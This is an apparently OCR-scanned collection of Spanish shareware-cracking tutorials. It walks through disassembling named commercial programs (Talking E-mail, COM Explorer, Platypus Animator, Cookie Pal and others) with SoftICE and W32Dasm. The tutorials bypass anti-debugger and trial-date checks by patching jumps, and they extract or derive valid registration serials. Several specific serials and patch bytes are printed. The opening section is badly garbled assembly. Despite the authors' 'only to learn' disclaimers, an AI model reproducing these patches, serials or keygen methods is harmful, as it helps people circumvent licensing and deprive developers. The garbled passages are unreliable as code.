ecx <- 


esi <- 


= edi 


d ptr 


d ptr 
d ptr 
d ptr 
d. prr 


d pir 


d 
d 
d 
d 


ptr 
ptr 
ptr 
ptr 


esi 


85DB test ebx, 


ebx 


ebx <-- edx=C 
04 <-- Otra vez movemos nuestro número 


dword ptr 


edx=edx-1 


Ecx tiene ahora la longitud del apellido. 


(si quedan letras) 


Suma de longitudes de nombre y apellido 


edi <-- eax=edi 
eax <--edx=eax. Aquí tenemos ahora la suma de longitudes. 


ebp+08] 


edx+2*edx] 
edx+4*edx] 
edx+4*edx] 
edx+4*edx] 


ebp-04] 


ecx+2*ecx] 
ecx+4*ecx] 
ecx+4*ecx] 
ecx+4*ecx] 


esi + ecx 


ebx=esi=D 


<- edx=edx+2*edx 
<- edx=edx+4*edx 
<- edx=edx+4*edx 
<- edx=edx+4*edx 


edx <- ebx=ebx+tedx=A+tedx= C 


<- ecx=ecx+2*ecx 
<- ecx=ecx+4*ecx 
<- ecx=ecx+4*ecx 
<- ecx=ecx+4*ecx 


=B + ecx= D 


[eax+edx+32] 


7425 je 004604FF <--— Si ebx=0 vamos a la mierda. 


Creamos el código en si mismo: 


* Referenced by a 


(U)nconditional or 


04 <-—- Movemos nuestro número a la izquierda. 


EJ: 


de 9->90 


a la izquierda. 


(C)onditional Jump at Address: 


| :004604FD (C) 
:004604DA 8BC3 mov eax, ebx <- eax=edx ( = D en la primera vuelta) 
:004604DC 33D2 xor edx, edx <-— edx=0 
:004604DE B91A000000 mov ecx, 0000001A <- ecx=1A (hex)== 26 (dec) 
:004604E3 F7F1 div ecx <- eax = eax div ecx y edx = eax mod edx = resto 
:004604E5 80C241 add dl, 41 <- Al resto le sumamos 41 hexa = 65 dec 
:004604E8 8BC3 mov eax, ebx <- eax=ebx ( = D en la primera vuelta) 
:004604EA 8816 mov byte ptr [esil], dl <- Donde teníamos el 

Caracter de código ASCII 'dl' 
:004604EC 33D2 xor edx, edx <- edx=0 
:004604EE B91A000000 mov ecx, 0000001A <- ecx=1A 
:004604F3 46 inc esi <- esi=esi+1l. Desplazamos el código chungo un lugar. 
:004604F4 F7F1 div ecx <- volvemos a dividir. 
:004604F6 FF45FC inc [ebp-04] 
:004604F9 89C3 mov ebx, eax <- ebx=eax; 
:004604FB 85DB test ebx, ebx 


código Malo movemos el 


en hexa. 


:004604FD 75DB jne 004604DA <- Si ebx<>0 volvemos para arriba. 


Bueno pués ya está, con este bucle final vamos sacando las letras de nuestro código gijeno, espero haberlo dejado claro, si no 
es así no dudéis en preguntarme cualquier cosa. 


Para terminar aquí os dejo, para el que lo quiera, un programilla en Pascal, para nuestro keygen. GWave.pas. 


«orto » 


Nada más por esta vez, espero que os haya resultado útil este tute. No olvidéis que nuestro objetivo sólo es aprender. (sin 
contar con la diversión que supone por supuesto ;-)) 


Hasta la próxima... 


«oo =ézeona » 


P.D.: Si hay algo que no he dejado sufientemente claro o lo que sea, ya sabéis: kuato_thorfhotmail.com 
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Karpoff Spanish Tutor 


Programa: Demian VBCrackME Trial 


Herramientas: Softice W32dasm Frogsice Filemon 


introduccion 


arrancamos el programa, y no hace absolutamente nada. puede ser que haya detectado el sice. 

arrancamos el frogsice, para esconder el debugger, y volvemos a ejecutar el programa. 

pero sigue sin hacer nada. 

arrancamos filemonitor, para ver que ficheros toca. y sorpresa, ¡¡ha leido el autoexec.bat!! 

vamos, que lo que hace es buscar alguna referencia al winice.exe en el autoexec, y si lo encuentra, se para. 
bueno, renombramos el autoexec para ver que pasa, y mira por donde, ahora funciona (Je je, pero por que 
tenemos el frogsice ejecutandose). si quitamos el frogsice, vemos como al ejecutar el programa, se para como 
al principio. 


bueno, por lo menos ya sabemos como funciona el programa, otra cosa es como atacarle. 


abrimos el sice, y pensamos un instante, vamos a poner un breakpoint en vbaend, que es la funcion, que sale de los 
programas de vb. ponemos 'bpx msvbvm60!__vbaend'. y pulsamos ctrl+d. 

y se nos para el sice. pero se nos para dentro de la propia rutina. no problem. editamos con el comando 'a', y ponemos 
un simple 'ret'. 

ejecutamos el ret, y vemos la llamada al vbaend. y justo encima, vemos un salto condicional (je), que si nos fijamos 
bien, salta justo despues del vbaend :-d 

bien, apuntamos la dirección, para parchearla después poniendo un simple jmp. 


y repetimos la operación hasta que no haya más vbaend (unas 6 veces). no siempre se soluciona con un jmp, a veces, 
es necesario nopear (la segunda vez). 

bien, ahora el programa funciona, tanto si tenemos el sice, como si no. pero, si adelantamos un mes la fecha, nos sale el 
temido 'your trial version is expired!'. 


bien, ahora, solucionaremos la protección de fecha, abrimos el w32dasmvb, y desensamblamos el ejecutable, 
buscamos la la cadena de antes, y vamos un poco más arriba, veremos otro salto condicional (¡e xxxxx), solo hace falta 
cambiarlo por un j¡mp. 

pero ahora es un poco más complicado, porque lo que hay que convertir en un ¡mp no es la típica sentencia 740d, si no 
esta otra 0f84d3000000. pero, entramos el sice, ponemos un breakpoint a dicha instrucción y con el comando 'a', 
ponemos el ¡mp a donde corresponda, y copiamos los bytes, que deben quedar así e2d400000090. 


y ya está. el programa funcionará siempre, con o sin el sice. y da igual la fecha que pongas. eso si, no hagas mucho 
caso a los dias restantes :-d 


txotxo 
visita mi página web: www.geocities.com/ttxotxo 
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Programa: Talking E-mail y ComExplorer 1.6 


PROTECCION: Serial, Limitación de Tiempo 
Descripcion: Utilitarios 


Dificultad: Facilucha, como siempre ;-) 


http://www. 4developers.com 
Softice, W32dasm y Smartcheck 


INTRODUCCION 


lo que me decidió a escribir este tutorial fue el precio del comexplorer 1.6 ($ 150). un utilitario interesante . 
normalmente me va bien con programas de menos de $20 y a partir de allí se empieza a complicar. si hubiera 
sido freeware no lo hubiera instalado en mi pc, pero siendo así no pude evitar la tentación de intentar 
crackearlo. en realidad todo comenzó con talking e-mail 3.0 de los mismos programadores y al buscar un 
programa para dejarte de tarea apareció el anteriormente citado. 


al atake 
talking e-mail 


instalamos y corremos el programa y nos aparece un viejito parlanchin y soplacornos que nos da la bienvenida junto 
con una pantalla que nos invita a registrarnos. introducimos nuestros datos (pone los tuyos sin miedo) en mi caso 
quedó así: 


Talking E-mail - UNREGISTERED VERSION 


y Talking E-mail 30 o Sp Taka | 
Listen to your E-mail instead of reading it. 
Copyright 1997 - 2000 4Developers LLC. etalkíM4developers. com 


Thank you for trying Talking E-mail. 


Talking E-mail enables you to listen to pour E-mail while you are working, surfing 
the Web, watching TW or doing anything else. 


Trial Ends: In 6 Days. 


If you wish to Order your copy of Talking E-mail, check the options below. Wée 
hope you'll enjoy using Talking E-mail. 


ORDER online and receive the unlock code to remove all limitations. If you 
have already ordered Talking E-mail type in the User Name and Registration 
Code and click the 'Unlock' button. 


User Name: [Verda Mate 
Registration Code: [123456789] 


Read Me Order By Mai | Other Products | Buy Now! | Try lt | 


pulsamos unlock y esto es lo que obtenemos: 
UNREGISTERED User 


The registration information pou have entered could not be validated. Please re-enter the 
user name and registration code you have LEGALLY obtained from 4Developers LLC. 
Make sure the case is correct. 


If you have not registered yet, you can click one of the buttons below to see how to order 
Talking E-mail. For help E-mail etalkG4developers. com 


como no sabemos inglés, no es nuestra culpa que no entendamos la parte que dice .....legally obtained ....;-) 


a lo nuestro, desensamblamos con 'w32dsm89"' y oh!, esto es lo que encontramos al pulsar 


4/32D asm List of String Data Items 


To Search Disassembly for String Data, Double Cli 


"má" 
"Pay" 
"Bal" 


es una aplicación hecha en vbs5. si leiste los tutoriales anteriores estarás de acuerdo en utilizar smartcheck. corremos el 
smartcheck, abrimos el talkmail pulsamos 'program' y 'start'. cuando el talkmail se carga, ponemos en la ventana 
nuevamente nuestros datos (nombre y número de serie). presionamos unlock y esperamos que aparezca el mensaje de 
error, luego vamos a program' y 'end'. cuando el smartcheck termina de hacer su trabajo, ponemos en la ventana de 
búsqueda '_vbastrcmp' o bien ' 12345678 ' ( si pones 1234567890 no lo va a encontrar porque es muy largo ). oprimes 
el botón 'find' varias veces y esto es lo que encuentra: 


_ vbaFreeSti[LPBSTR:006BE7B8] retums DW'ORD:20 AL ]] 4D Íno in 
— vbaFreeVar[VARIANT:Integer:1] retums DWORD:20 E anad Short" stingl 004F13DO0 
vbaStrEmpíString:'"1 2345678...” String:""S469-RG8...”] retums DWORD:1 | L =""1234567890" 

— vbaFreeS tr[LPBSTR:006BE7C4) returns DWORD: 20 E unsigned short * string? = OD4EC3C8 

$9 Len[String: "Yerba Ma...”] retums LONG:10 E "B469-RGEVHOVHOG" 

$% LCasetíStino:"Yerba Ma..."'] 
%  _ vbaStiMove(String: "yerba ma...”, LPBSTR:006BE7B8) retums DWORD:4F1604 

%  _ vbaStiCopyíString:""S469-", LPBSTR:D06BE7C4]) returns DW'DRD:4F1460 


Show All Events 


si no podes encontrar nada, tenes que pulsar SS y obtendras lo mismo que en el gráfico, pero con tus 
datos. efectivamente '$469-rg8v+Hqv+Hqg' es el serial válido en mi caso. 


si queres practicar con soft-ice y tener una idea de lo que estas viendo,desensamblalo con w32dsm89vb que también 
encontrarás en esta página. 


comexplorer 1.6 


ese fue el comienzo de la historia. fuí al sitio de los programadores y bajé este programa. lo corrí, y esto es lo que 
encontré. 


COM Explorer 1.6 


Fr 
1234567890] 


puse mis datos, oprimí unlock y como respuesta obtuve lo siguiente 


UNREGISTERED User 


Please re-enter the registration code and user name you have legaly obtained from 


AN The registration information you have entered could not be validated. 
4Developers. 


If you have not registered yet you can click one of the buttons below to see how to 
register COM Explorer. 
For help e-mail supportM4developers. com 


todo igual que antes. si te digo que no se puede crackear con el método anterior no me vas a creer ( yo tampoco lo creía ). 


fuí al smartcheck, cargue el ejecutable, llené con mis datos, acepté y nada. pulsé La 


Show All Events 


y ....nada 


extraño, no. lo primero que pensé fue que como cuesta $150, la protección era más eleborada. nada de eso. la respuesta 
era muy simple, este programa (de ventanas exactamente iguales al anterior y bajado del mismo sitio ) a diferencia del 
anterior no estaba hecho en visual basic. y ahora que ???....... fácil a olvidarse del smartcheck y a trabajar con soft-ice. esta 
vez nos ayudaremos con el 'w32dsm89' (no como en el anterior que usamos el 'w32dsm89vb”) 


una diferencia entre el listado muerto que nos da el w32dsm89 y el vivito y coleando del soft-ice. en el listado muerto 
vemos todas las instrucciones que ejecutará o no el procesador y además tenemos las string-ref que son una gran ayuda. 
pero, por ejemplo, ante un salto condicionado (je, jne, etc) el único que nos dirá que camino va a tomar es el soft-ice. 


corremos el comexplorer, aparece la ventana de registración, ponemos nuestros datos (como en el gráfico de arriba) . 
presionamos control-d , ponemos un bpxhmemcpy y pulsamos f5 para volver a windows. poner un breakpoint en 
hmemcpy (mi favorito) nos hará trabajar un poco más, pero podremos ir viendo que es lo que realiza el programa. hecho 
esto presionamos unlock y entramos en el soft-ice. borramos el breakpoint con bc* para que no nos moleste. estamos en 
algún lugar del kernel (como ya sabemos esto no nos interesa) vamos pulsando f12 (para viajar de ret en ret) pasaremos 
por el user (que tampoco nos interesa) llegaremos al comexplorer!text pero seguile sacudiendo a f12. volverás a pasar por 
el kernel y el user y te detendrás justo cuando vuelvas a alcanzar el comexplorer!text ( que como lo sé, porque ahora sí, 
de seguir pulsando f12 aparecerá la ventana de error ) de aquí en más iremos pulsando £10 , para ir de instrucción en 
instrucción. lo que vemos ahora no es un listado muerto sino el camino que va tomando el soft-ice: 


XXxx : 00429113 jmp 00429207 

Xxxx : 00429207 ret 

XXxXx : 00408f0c push 000000ff 

Xxxx : 00408f11 push 00458e78 

XXxx : 00408f16 lea ecx , dword ptr (esi+0000046c) 
XXXx : 00408fLc call 004291db 

XXxx : 00408£21 push 00458d78 


si tipeas d00458d78 verás tus datos. esto quiere decir que estamos cerca. sigue pulsando f10 (unas veces más) y verás lo 
siguiente: 


XXxx : 00408148 call 0042582d 


XXxx : 00408f4b test bl, bl 


XXxXx : 00408f4f Jz 00408160 


XXxx : 00408160 call 00408ac0 
XXxx : 00408165 test eax, eax 
XXxx : 00408167 Jz 00409018 


el soft-ice nos informa que este último salto se va a efectuar. de ser así estamos en problemas. como nos damos cuenta? 
interpretando el listado de w32dsm89 o bien invirtiendo el salto con 'r fl z' y viendo donde vamos a parar oprimiendo f5. 
si hacemos esto último, daremos con el mensaje de felicitación por habernos registrado. como sabemos que es ese 
salto y noel anterior? pues lo mismo. checkeando el listado o invirtiendo el flag. 


repasemos lo que hemos hecho hasta ahora. desde que entramos en el soft-ice, fuimos trazando primero con f12 hasta 
llegar a comexplorer!text por segunda vez (unas 20 veces en total) . a partir de allí con £10 hasta xxxx:00408f67.fuimos 
capaces de encontrar los datos por nosotros ingresados. en ningún momento nos apareció el mensaje de error, y sí 
encontramos un call, seguido de un test, seguido de un jz , al que si le cambiamos el flag nos conduce al éxito, mientras 
que si lo dejamos igual al fracaso. que quiere decir todo esto?????7799?.......... exacto!!!....... que la llamada a la rutina de 
comprobación se encuentra en el call 00408ac0. 


hacemos lo mismo que antes (o directamente ponemos un bpx00408f60) y al llegar al call 00408ac0 en lugar de oprimir 
f10 pulsamos f8 para meternos dentro del llamado. una vez allí seguimos trazando con f10 y vas a ir checkeando que hay 
en los registros . vas a ir pasando por una serie de loop's e irás viendo como se forma tu serial. cuando llegues a 


XXxx : 00408c33 call 004259la 
XxXxx : 00408c38 lea ecx, dword ptr (esp+14) ------ aquí pulsa decx 


justo a la salida del call cuando el soft-ice esta en la posición xxxx:00408c38 se termina de generar nuestro número. si allí 
pulsas decx lo verás en la ventana de datos del soft-ice (debes detenerte justo en 00408c38 porque en seguida se modifica 
el registro ecx ) a partir de allí si sigues trazando volverás a ver el serial en algún registro ya que empiezan las 
comparaciones ) 


todo lo anterior se puede hacer cargando la víctima en el simbol loader del soft-ice y poniendo un breakpoint en 
bpx00408c38. pero es interesante ver como se genera el serial paso a paso (estamos aprendiendo no buscando seriales). en 
mi caso dió '6769-x6lqfr2' 


bueno, llegamos a un final felíz. este tutorial fue más pesado que los anteriores, pero en el futuro nos será de utilidad, ya 
que no seguimos recetas mágicas o preestablecidas sino que paso a paso analizamos que hace el procesador. si después de 
todo esto todavía te quedaron ganas, podés probar con el cookie-terminator 1.1 de los mismos programadores ( léase 
tarea para el hogar). tiene una protección muy parecida a este último, (ojo puse muy parecida, no exactamente igual) con 
las mismas ganas de aprender e igual paciencia podrás resoverlo. seguramente habrá también algunos con la protección del 
"talking e-mail' 


por dudas o consultas comunicate a http://yerbamatear yahoo.com 


espero que este tutorial te haya sido útil, nos vemos en el próximo 


yerba mate 


' todo es fácil cuando se sabe como' 


mportante: lo que hacemos aquí es tratar de aprender como abrir un candado con un alambre, no como robar alguna 
propiedad. si vas a usar este programa debes comprarlo. si no fuera por los programadores de shareware no 
tendríamos con que entretenernos. 


Karpoff Spanish Tutor 


Programa: Platyplus Animator v5.2, CP Setup v3.6 


PROTECCION: Serial, Limitación de tiempo y funciones. 
Descripcion: Aplicación 


Dificultad: Facileta, ma non troppo. 


http: //www.c-point.com 


introduccion 
platypus es una aplicación que permite la creación de videos en formato avi, extraer imágenes de videos, convertir 
avi en mpeg, etc. elegí este programa porque la protección es distinta a las que hemos visto hasta ahora. cp setup es 


de los mismos programadores, te permite crear instaladores para tus aplicaciones. la gente de e-point en general, 
presenta en su página aplicaciones interesantes. 


al atake 


instalá el programa, correlo, clickeá en help, register y completá con tus datos. hecho esto estaremos ante esta pantalla: 


Registration E 


Platypus Animator is shareware. Registration is US$20 only, 
which entitles pou to the latest version and removes the 
Platypus logo from the output. 


E Point Pty Ltd 

21 Willlamson Road, Para Hills 5096, Australia 
Tel: +618 8263 3623 Fax: +518 8396 1477 
Web: http: 44. c-point. com 


Email: c-pointí3c-point, com 
On-line orders 
Liser name: [Yerba Mate 
User ID: í 234567H Cancel | 


hasta ahí todo normal, el problema viene cuando le das al botón en | por más que le sacudas con violencia no pasa 
nada. al principio pensé que tenía que ver con el largo del número de serie, pero no. entonces con el largo del nombre, 
tampoco. yo no se si era mi imaginación o el pato cada vez se sonreía con más ganas ;-). 


seguramente alguna vez te has topado con un programa así, o talvéz con un programa que ni siquiera tiene un botón de ok. 
estos programas entran dentro de un 'loop' contínuo comparando el name y serial . la única forma de salir del loop es con el 
serial correcto o bien con el botón de cancel. usaremos soft-ice. como no sale cartel de serial inválido no podremos usar 'bpx 
messageboxa' ni tampoco 'bpx getdlgitemtexta'. y entonces que usamos?????... pues sí 'bpx hmemcpy' pero esta vez no solo 
para recorrer toda la protección y practicar asembler, si no porque no nos queda otra. hablando de practicar asembler, ya es 
hora de que te imprimas algún curso de asembler (o todos) y la tabla de caracteres ascii, y los leas y releas mientras vas en el 
subte, tren, colectivo, etc. si vos manejas no lo intentes, puede ser peligroso ;-). 


a lo nuestro, control-d, bpxhmemcpy, £f5 y oprimimos el botón de ok. entramos al soft-ice (borremos el breakpoint con bc* 
para que no nos moleste). estamos en el kernel, vamos oprimiendo f12 hasta llegar al avimaker!text (unas10 veces). para que 
no te pierdas, aquí es donde apareces: 


00487192 mov ecx, (ebp+10) 


si le sacudís unas 28 veces al f10 esto es lo que verás. uso el texto del w32dsm89 para no cometer errores en el tipeado (léase 
soy un vago) : 


:00425576 8B4C240C mov ecx, dword ptr [esp+0C] Aqui se pone Yerba Mate en el ECX 
200425574 8D44242C lea eax, dword ptr [esp+2C] 

:0042557E 50 push eax 

:0042557F 51 push ecx 

:00425580 074424 7000000000 mov [esp+?0], 00000000 

:00425588 ESE35F0000 call 0042B570 

:0042558D SBS7B0000000 mow eax, dword ptr [edi+000000B0] Aqui 12345678 

:00425593 8D74242C lea esi, dword ptr [esp+2C] Aqui  LKHICON 


para poder leer lo que hay en los registros, debes pasarte con el soft-ice. por ejemplo, para leer tu nombre en el ecx debes 
hacer que el soft-ice se detenga en 0042557a y tipear decx ( ya se que lo sabías fue un simple repaso ). todo lo anterior nos 
indica que el éxito está próximo. leemos nuestro nombre, nuestro serial y algo extraño. no se, pinta de serial correcto no tiene 
pero quién sabe. avancemos un poco más. inmediatamente debajo de lo anterior tenemos esto: 


este sería un buen momento para tener a mano el código ascii y el apunte de asembler. detengamos el soft-ice justo en el 
primer renglón. en la ventana que contiene a los registros (en su parte inferior derecha) vemos que el valor que se va a pasar al 
dl es 31.el procesador solo entiende hexadecimal. si te fijas en la tabla 31(en hexadecimal) significa 1 (en ascii). si no tenés 
una tabla a mano, hacé '?31' en el soft-ice.que de donde salió este '1' 22? de nuestro falso serial. luego lo compara con 4e que 
significa l ,esta 1 solo puede provenir de un lugar. despues compara '31' con '4e', como evidentemente son distintos, 
pulsaremos 'r fl z' para invertir el salto y poder ver que sigue haciendo. vemos que en 00425543 pone en dl el número 32 (que 
corresponde al 2) para luego compararlo con 4b (que corresponde a k). es evidente que está comparando 12345678 con 
Ihkim que en mi caso es el serial correcto. algo más, en alguna de las 6 comparaciones no inviertas el salto. así vemos que 
continúa haciendo. 


pasarás por un jump que te enviará más adelante y en la posición 004255f1 volverás a ver tu nombre con algún agregado. 
presionamos algunas f10's más y tenemos esto. 


te suena todo esto. seguro que sí, vuelve a hacer lo mismo que antes pero para 'ck5iGj' cualquiera de los dos seriales 
funciona perfectamente. te acordás cuando crackeamos el 'calendar builder' nos pasó lo mismo, o talvez tenga que ver con 
"personal license' o 'site license", no lo sé te lo dejo para que lo investigues. una cosa más, cuando ingresas el serial correcto y te 
agradece por haberlo registrado, crea en la carpeta donde lo tenes instalado un archivo '.bin'. para que en la ventana 'help' 
desaparezca la opción 'register' tenes que cerrar el programa y abrirlo nuevamente así lo puede leer. si lo abris con el block de 
notas verás en él tus datos. 


para que nos sirvió todo lo visto hasta acá. ¿¿¿para crackear esta aplicación???. !!!!Mmnnnnnnnoo000000000!!!!!! si 
contestaste que sí perdiste mucho tiempo, hubieras buscado el serial en la web. nos sirvió para aprender un poco más sobre 
esquemas de protección. no te quedes solamente con lo que hemos hecho. borra el archivo '.bin' para volver a estar 
'unregistered' introducí tus datos nuevamente, trazá instrucción por instrucción, metete en los call con f8, fijate como pasa de 
minúsculas a mayúsculas, en fín tratá de entender como funciona. sé que no es fácil pero te servirá en futuros programas. 


ahora te toca a vos.....si entendiste lo anterior, vas a poder registrar 'cp setup v3.6' que bajarás del mimo sitio. en mi caso la 
clave fue mki¡On y si se te complica de demasiado busca cerca de 0041295b que por ahí anda la cosa. en general creo que 
todas las aplicaciones responden a protecciones similares a la aquí expuesta ( yo probé con tres y después me aburrí, ya que 
eran todas iguales ). 


en un destello de lucidez, le puse número a este tutorial. si te pareció dificil o no muy claro deberías leer los anteriores en este 
orden: 


tutorial 1... ¿pump over-matris 
22. calendar builder-visual business card-visual labels 
Is ¡mdcdplayer-infotel 
4 unos cuantos 
a talking e-mail - comexplorer 


por dudas o consultas comunicate a http://yerbamatear Oyahoo.com 


espero que este tutorial te haya sido útil, nos vemos en el próximo 


yerba mate 


' todo es fácil cuando se sabe como' 


importante: lo que hacemos aquí es tratar de aprender como abrir un candado con un alambre, no como robar alguna propiedad. 
si vas a usar este programa debes comprarlo. sino fuera por los programadores de shareware no tendríamos con 
que entretenernos. 


Karpoff Spanish Tutor 


Programas: |[Cookie Pal v1.2b - Cookie Crusher v2.6 


http://www.kburra.com , http://www.thelimitsoft.com 


INTRODUCCION 


Bueno, vamos a ver como se consigue un Número de Serie correcto para estos programas. Aunque de 
empresas diferentes, los dos usan el mismo y sencillo método para calcular el Número de Serie que 
corresponde a nuestro nombre. No es que tenga mucha dificultad, pero tiene su gracia ver como se complican 
la vida algunos programadores intentando ocultar sus manejos para ponernos las cosas "dificiles", en fin... 
Me gustaría citar algo que he leido hace poco: 


"La seguridad es equivalente a una puerta muy sólida, pero con la llave escondida cerca..." 


Vamos a ver si encontramos todo el llavero... 


al atake 


cookie pal v1.2b 


instalando 


vamos alla, setup, ventana de welcome, ventana de licencia, y ...ventana de registro. rellenamos los datos con lo de 
siempre: 


Registration ES | 


If you have already purchased Cookie Pal, please enter 
your name and registration number EXACTLY as they 
appear on pour registration notice, 


lfyou are evaluating Cookie Pal, then just leave these 
BLANK and click Next to begin your trial period. 


Name JARKANIAN 
Registration Number [1224567890 


¿<< Back | [_nem>> ] Cancel | 


eso del exactly de ahí arriba parece de lo más amenazador, suena a número supercomplicado con mayúsculas, 
minúsculas, caracteres especiales y todo lo demás..., nada más lejos de la realidad, como veremos más adelante. no hay 
que fiarse de las apariencias. 


una vez aquí, ctrl+d y nos vamos a ver que nos cuenta softice... 
softice 
lo primero es lo primero: dex 0 eax, dex 1 es:edi, dex 2 ds:esi, con la ventana n* 3 ya veremos que hacemos. 


metemos un task para ver las tareas activas y encontramos dos que se refieren a nuestro programa: 


+ Cpalinst 
. cplsetup 


vamos a empezar con cpalinst que por algo aparece la primera. pues le hacemos un hwnd cpalinst para ver que 
información sacamos de las ventanas. (no voy a poner la información que devuelve el comando, es muy trabajoso). 


esta parece la buena, tres buttons y dos edit, que es lo que tenemos arriba, en la ventana de registro, así que vamos a 
meter un breakpoint a la dirección del window handle del primer edit, que en mi caso es 048c. así que, bmsg 048c 
wm_gettext. 


hacemos un crtl+d, volvemos a la ventana de registro, le damos al next y el estupendo softice salta en 
user!bozosliveshere, (siempre me he preguntado quien coño será el tal bozos y a quien le importa que viva ahí), 


seguimos con £12 unas cuantas veces hasta aparecer en epalinst!.text +375e. y en la dirección 00404760 limpiamos el 
break con un be * y una vez aquí vamos trazando con el £10 hasta legar a: 


:00404740 8d85fcfeffff lea eax, dword ptr [ebp+fffffefc] -> nuestro número txungo en eax. 
:00404746 50 push eax 
:004047a7 8d857cffffff lea eax, dword ptr [ebp+ffffff7c] -> nuestro nombre en eax. 


:004047ad 50 push eax 

:004047ae Ofbf862c010000 movsx eax, word ptr [esi+0000012c] 
:004047b5 50 push eax 

:004047b6 668b862a010000 mov ax, word ptr [esi+0000012a] 
:004047bd 50 push eax 

:004047be eS5b250000 call 00406d1e -> investigemos esta llamada. 
:004047c3 66£7d8 neg ax 

:004047c6 1bc0 sbb eax, eax 

:004047c8 £7d8 neg eax 

:004047ca 3ac3 cmp al, bl 

:004047cc 740b je 00404749 -> ojo con este, que nos saca fuera. 
:004047ce 395dfc cmp dword ptr [ebp-04], ebx 

:004047d1 7406 je 004047d9 -> y este también. 

:004047d3 có462801 mov [esi+28], 01 

:004047d7 ebOf ¡mp 004047e8 


call 00406d1e 


dentro de esta llamada observamos fascinados como el nombre va sufriendo una serie de transformaciones de lo más 
"in". de arkanian pasa a arkanian y de ahí a este engrendro, naariknaankiraan. (todo esto se ve dandole caña al 
f10), llegaremos al código de abajo después de un rato: 


* referenced by a (u)nconditional or (c)onditional jump at address: 
1:00406d76(u) 


:00406d8e ££7508 push [ebp+08] 

:00406d91 e82cfeffff call 004069c2 ->aquí manipula el engendro. 
:00406d96 894514 mov dword ptr [ebp+14], eax -> sorpresa, eax = ebx = edx =xXXXXXXX. 
:00406d99 8d45d0 lea eax, dword ptr [ebp-30] 

:00406d9c 6a2d push 0000002d 

:00406d9e 50 push eax 

:00406d9f e80O8ccffff call 004039ac 

:00406da4 59 pop ecx 

:00406da5 3bc6 cmp eax, esi 

:00406da7 59 pop ecx 

:00406da8 89450c mov dword ptr [ebp+0c], eax 

:00406dab 89751c mov dword ptr [ebp+1c], esi 

:00406dae 741e je 00406dce -> saltamos. 


no voy a entrar en el rollo macabeo de explicar detalladamente todo lo que pasa en call 004069e2, pero os diré que 
coge valor por valor del engendro en que ha convertido nuestro nombre y junto con un valor fijo que planta en esi 
(5034446801) lo empieza a manipular en un largo bucle de instrucciones que se repite 30 veces (leh , para los 
puristas). 


una vez que retornamos de la llamada, observamos que eax, ebx y edx tienen el mismo valor. este valor es almacenado 
en ebp+14 y luego utilizado en el siguiente código para establecer la comparación entre el serial bueno y el serial 
txungo: 


* referenced by a (u)nconditional or (c)onditional jump at addresses: 
1:00406dae(c), :00406dc6(c) 


:00406dce 6a0a push 0000000a 

:00406dd0 8d45d0 lea eax, dword ptr [ebp-30] 

:00406dd3 5f pop edi 

:00406dd4 57 push edi 

:00406dd5 56 push esi 

:00406dd6 50 push eax 

:00406dd7 eSf2cbffff call 004039ce ->aquí manipula nuestro número txungo. 

:00406ddc 83c40c add esp, 0000000c 

:00406ddf 3b4514 cmp eax, dword ptr [ebp+14] -> eax= 499602d2 y [ebp+14] = xxxxxxxx. 
:00406de2 018561010000 jne 00406149 -> como no son iguales, ya sabes a donde vamos... 
:00406de8 8b450c mov eax, dword ptr [ebp+0c] 


call 004039ce 


afortunadamente la manipulación de nuestro número es corta (solo consta de 10 caracteres) y la secuencia del bucle se 
reduce a ocho instrucciones: 


* referenced by a call at addresses: 

1:00405a32 , :00406dd7 , :00406e19 , :00406e41 , :00406e91 
|:00406ea1 

| 


:004039ce 8b542404 mov edx, dword ptr [esp+04] -> nuestro serial txungo en edx 
:004039d2 33c0 xor eax, eax -> eax =0 


* referenced by a (u)nconditional or (c)onditional jump at address: 
1:004039e5(u) 


:004039d4 820a mov cl, byte ptr [edx] -> los caracteres del serial a cl. 
:004039d6 84c9 test cl, cl -> testea el valor de cl. 

:004039d8 740d je 00403987 ->salta al ret cuando no haya más caracteres. 
:004039da Ofbec9 movsx ecx, cl 

:004039dd 8d0480 lea eax, dword ptr [eax+4*eax] 

:004039€0 42 inc edx 

:004039e1 8d4441d0 lea eax, dword ptr [ecx+2*eax-30] 

:004039e5 ebed jmp 004039d4 -> sigue el bucle.. 


* referenced by a (u)nconditional or (c)onditional jump at address: 
1:004039d8(c) 


| 
:004039e7 c3 ret -> volvemos a 00406ddc. 


observa detenidamente el código en 004039da y las tres instrucciones siguientes,. ¿que hacen esta secuencia de 
instrucciones?. simplemente convierten a valor hexadecimal el serial de prueba que hemos puesto y que muestra edx. 


conclusiones 


cuando retornamos de la llamada, eax = 49960242, este es el valor en hexadecimal de 1234567890, no hay más que poner 
el siguiente comando, ?eax, en softice para ver que estamos en lo cierto. después se establece la comparación con el 
valor almacenado en ebp+14, que es el correspondiente a nuestro nombre y, si no son iguales (que no lo son) el salto 
siguiente en :00406de ¡ne 00406f49, nos manda fuera. 


por lo tanto la conclusión es obvia, el valor de ebp+14 es el valor en hexadecimal del número de serie bueno 
correspondiente a nuestro nombre. cogemos la calculadora del windows y hacemos la adecuada transformación. 


solo queda registarse con el número bueno que acabamos de obtener para ver esto de aquí abajo cuando pinchamos en 
el botón about una vez finalizada la instalación: 


About Cookie Pal E 
Cookie Pal Version 1.2b 
Copyright O 1997-1998 Kookaburra Software 
¿All Riohts Reserved EN 


Al 


This product is registered to: 
ARKANIAN 

Registration Code ¡ JE, JE, JE! 
Single Copy License 


cookie crusher v2.6 
instalando 


realizamos la instalación y vemos que no hay ventana de registro, así que suponemos que el programa se inicia como 
shareware y que la ventana de registro estará en alguna opción del tipo register, licence o en el menu de about. 


regedit 
una vez instalado y cuando lo hemos ejecutado una vez, vamos a echar un vistazo por el registro del windows. a veces 


encuentras cosas sorprendentes, si no leete el estupendo tutorial de gádix sobre macromedia flash 4 que encontrarás en 
este mismo sitio. 


ejecutamos regedit y en hkey_current_user/software/the limit software/cookie crusher encontramos estas interesantes claves: 


e license number ''00000000"" 
e licensee ''unregistered 30-day evaluation copy only"' 


¡una estupenda pista!, el serial correcto consta de 8 caracteres, ¿el programa manipula el nombre y lo transforma a 
valor hexadecimal?... pues aunque parezca mentira eso es exactamente lo que hace. 


iniciamos cookie crusher, vamos al botón de about y de ahí al de license now y rellenamos con lo de siempre: 


Cookie Crusher Registration 


License Name: 
[ARKANIAN 


License Number: 


fi 234567890 


y te preguntarás ¿porqué diez caracteres si sabemos que son ocho?, pues porque el valor hexadecimal de 1234567890 
es 4996022, (como hemos visto con el programa anterior), porque me lo se de memoria y cuando aparece este valor 
en cualquier registro del softice pues ya se de que va la cosa. 


así que ctrl+d y vamos con softice. 
softice 


